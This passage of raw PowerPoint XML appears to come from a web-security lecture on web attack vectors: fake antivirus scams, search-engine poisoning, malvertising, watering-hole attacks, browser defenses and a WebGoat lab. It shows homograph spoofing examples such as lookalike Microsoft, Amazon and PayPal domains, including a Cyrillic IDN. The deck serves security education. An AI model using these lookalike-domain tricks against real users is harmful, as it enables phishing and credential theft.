              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Educational/Professional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Fake AV/AM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Game the search engine’s relevance rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Related content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Massive inbound linking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Relevant inbound linking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site redirects to malicious content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="2014" descr="http://dkcnews.com/wp-content/uploads/2014/10/Kimme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238" y="1302640"/>
            <a:ext cx="4110162" cy="3174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25970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Updates &amp; FAKE AV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2620787" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preys on user’s good intentions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often mimics OS-level UI components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes mimics well-known security brands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May deliver malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…But wait!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May deliver absolutely nothing for the low cost of $49.99.   If you act now.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="https://community.mcafee.com/servlet/JiveServlet/showImage/38-3073-14371/microsoft-update-big.jpg+%28890%C3%97545%2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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="932588"/>
            <a:ext cx="5257800" cy="308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hitmanpro.files.wordpress.com/2012/08/win8se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52550"/>
            <a:ext cx="460253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2878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WYSIWYG… or NOT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URL Obfuscation makes suspicious URLs look legitimate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL shortening services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Homographic attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASCII – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.rnicrosoft.com/en-us/download/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASCII – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.arnazon.com/prime/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASCII – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://I92.I68.0.I</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASCII – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://oregonstate.ecIu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IDN – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://payp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Cyrl-AZ" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>l.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>internationalized domain name)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://xn--paypl-7ve.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1086694" lvl="3" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>paypal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1086694" lvl="3" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Latin characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1086694" lvl="3" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>раураl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1086694" lvl="3" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Using Cyrillic characters (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>р”,“а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>and”у</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>”)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1155" y="2343150"/>
            <a:ext cx="878977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600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.rnicrosoft.com/en-us/download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Boo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821" y="2343150"/>
            <a:ext cx="744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3600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.arnazon.com/prime/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838192" y="2364998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600" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://I92.I68.0.l</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Boo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0047" y="2343150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600" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://oregonstate.eclu/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2495663" y="2343150"/>
            <a:ext cx="415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3600" spc="-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8"/>
              </a:rPr>
              <a:t>http://oregonstate.eclu/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" spc="-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1682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-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Social media: A gift to malware authors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anti-spam systems have become very effective.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social media opens a new world for malicious URL </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>delivery and information gathering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I saw the link on the Facebook and Twitter,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>so it must be OK, right?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Have you Google or Facebook searched </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>your lecturers?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Who ever heard of “Robin Sage”?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Who has already been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Catfished</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>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24" y="971550"/>
            <a:ext cx="3798228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473764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malvertising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1013520"/>
            <a:ext cx="259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Malicious actor uses advertising networks as delivery mechanism for malware.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Does not require any web site or hosting provider compromise.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Very dangerous, as most end users implicitly trust content on high-profile, popular, and known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Ask the NY Times</a:t>
            </a:r>
            <a:b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 about it!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://book.itep.ru/10/symantec/2011/malvertis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50" y="1352550"/>
            <a:ext cx="6047650" cy="2612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932585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malvertising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3200400" y="1013520"/>
            <a:ext cx="259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Malicious actor uses advertising networks as delivery mechanism for malware.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Does not require any web site or hosting provider compromise.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Very dangerous, as most end users implicitly trust content on high-profile, popular, and known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Ask the NY Times</a:t>
            </a:r>
            <a:b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 about it!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318681" y="1770913"/>
            <a:ext cx="1828800" cy="76347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400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clean Website with Ads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18681" y="3582097"/>
            <a:ext cx="1828800" cy="76347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US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Advertising Network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512559" y="2113811"/>
            <a:ext cx="1524000" cy="644093"/>
            <a:chOff x="5512559" y="2113811"/>
            <a:chExt cx="1524000" cy="644093"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Right Arrow 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5512559" y="2113811"/>
              <a:ext cx="1524000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57081" y="2419350"/>
              <a:ext cx="9040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ranklin Gothic Book" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Redirect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512559" y="3772965"/>
            <a:ext cx="1594456" cy="988107"/>
            <a:chOff x="5512559" y="3772965"/>
            <a:chExt cx="1594456" cy="988107"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Right Arrow 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5512559" y="3772965"/>
              <a:ext cx="1524000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04681" y="4176297"/>
              <a:ext cx="15023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ranklin Gothic Book" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Seed Malicious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Franklin Gothic Book" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Ads</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 4" descr="C:\Users\root\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5HD8YZZ1\malware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9545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2632881" y="2686050"/>
            <a:ext cx="1448538" cy="762001"/>
            <a:chOff x="2632881" y="2686050"/>
            <a:chExt cx="1448538" cy="762001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Right Arrow 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3509549" y="2876181"/>
              <a:ext cx="762001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32881" y="2897773"/>
              <a:ext cx="10204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ranklin Gothic Book" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Metadata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61681" y="2686050"/>
            <a:ext cx="1830909" cy="762001"/>
            <a:chOff x="4461681" y="2686050"/>
            <a:chExt cx="1830909" cy="762001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Right Arrow 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="4271550" y="2876181"/>
              <a:ext cx="762001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18881" y="2870471"/>
              <a:ext cx="1373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ranklin Gothic Book" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Malicious Ads</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Right Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1984704" y="2113811"/>
            <a:ext cx="1063295" cy="38173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pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://redsealnetworks.files.wordpress.com/2014/07/hacker.png?w=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956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khareinstitute.com/onlinetestcss/user_compu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4950"/>
            <a:ext cx="160370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5512559" y="1504950"/>
            <a:ext cx="1524000" cy="631874"/>
            <a:chOff x="5512559" y="1504950"/>
            <a:chExt cx="1524000" cy="631874"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Right Arrow 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5512559" y="1755085"/>
              <a:ext cx="1524000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pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Picture 4" descr="C:\Users\root\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5HD8YZZ1\malware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3990" y="150495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984704" y="1504950"/>
            <a:ext cx="1063295" cy="631874"/>
            <a:chOff x="1984704" y="1504950"/>
            <a:chExt cx="1063295" cy="631874"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Right Arrow 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1984704" y="1755085"/>
              <a:ext cx="1063295" cy="381739"/>
            </a:xfrm>
            <a:prstGeom prst="right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5000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Picture 4" descr="C:\Users\root\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5HD8YZZ1\malware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281" y="150495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44191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Waterhole Attacks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8400" y="1388805"/>
            <a:ext cx="281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With closed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OSes</a:t>
            </a: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 and application signing, developers have become a prime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ranklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An easy way to target developers is to hack a resource (forum for example) known to be used by a community of developers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2" descr="http://securitydaily.net/wp-content/uploads/2014/07/watering-hole-attack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" y="895350"/>
            <a:ext cx="6019800" cy="392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586060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What’s the SOLUTION?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Skynet!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1158063393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ATTACKS – COMMON DEFENSES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/>
              <a:t>URL/Domain Reputation Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Real-time protection in browser or network device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Search result link annotation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Site Certification Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Client and Gateway AV/AM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Safe URL Shorteners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Content provider education</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Banks love to train their customers to be phishing victims.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Brand monitoring services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>End user education</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>The Human Firewall. Good luck with that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>In reality, some progress has been made, although we are always a step behind.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1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3551451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RESULT ANNOTATION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Saturday, February 23, 2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="https://community.mcafee.com/servlet/JiveServlet/previewBody/1103-102-2-1123/Site%20Advisor%20Ratin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47750"/>
            <a:ext cx="5957048" cy="368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15020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– SESSION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Topics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The Web (primer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Web as a threat delivery mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Web attack vectors and common defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Browser and plugin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Lab 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>WebGoat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Attack a poorly-secured web application, using three common attack types.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Homework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Author your own poorly secured web application and FIX it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1749224550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URL SHORTENING SERVICES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59181"/>
            <a:ext cx="4267200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http://www.siteadvisor.com/images/rating_gree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76" y="3943350"/>
            <a:ext cx="701612" cy="67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59181"/>
            <a:ext cx="4114800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www.siteadvisor.com/images/rating_red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918547"/>
            <a:ext cx="606552" cy="58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194958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Browser-level attacks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User Agent in the Crosshairs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="469945040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 Attack Surface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Saturday, February 23, 2019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56" y="819150"/>
            <a:ext cx="5466119" cy="4022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4276796" y="1581150"/>
            <a:ext cx="4361546" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000">
              <a:alpha val="10196"/>
            </a:srgbClr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charset="0"/>
              <a:ea typeface="MS PGothic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9400" y="2461127"/>
            <a:ext cx="19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Browser Attacks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76796" y="822359"/>
            <a:ext cx="4361546" cy="686042"/>
            <a:chOff x="4571999" y="1130847"/>
            <a:chExt cx="4272521" cy="1002753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4571999" y="1130847"/>
              <a:ext cx="4272521" cy="1002753"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC000">
                <a:alpha val="10196"/>
              </a:srgbClr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06417" y="1362307"/>
              <a:ext cx="1554329" cy="5398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User Attacks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47168" y="3096823"/>
            <a:ext cx="3191174" cy="686042"/>
            <a:chOff x="4571999" y="1130847"/>
            <a:chExt cx="4272521" cy="1002753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4571999" y="1130847"/>
              <a:ext cx="4272521" cy="1002753"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC000">
                <a:alpha val="10196"/>
              </a:srgbClr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54837" y="1362307"/>
              <a:ext cx="2673808" cy="5398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  <a:r>
                <a:rPr lang="en-US" b="1" baseline="300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rd</a:t>
              </a:r>
              <a:r>
                <a:rPr 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Party Attacks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87641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962400" y="849756"/>
            <a:ext cx="4724400" cy="38018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pic>
        <p:nvPicPr>
          <p:cNvPr id="19468" name="Picture 12" descr="http://mozorg.cdn.mozilla.net/media/img/firefox/firefox-256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575" y="2498725"/>
            <a:ext cx="182562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Features of the modern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200" dirty="0"/>
              <a:t>Content Security Policy Enforcement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Same Origin Policy (SOP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>XMLHTTPRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Cross Origin Resource Sharing (CORS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>URL Scheme Access Rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>OS Isolation/Sandboxing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Redirection Restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Content handling/sniffing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Disruptive Script Handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Built-in and Plug-in URL Reputation Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Add-on AV/AM Content Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
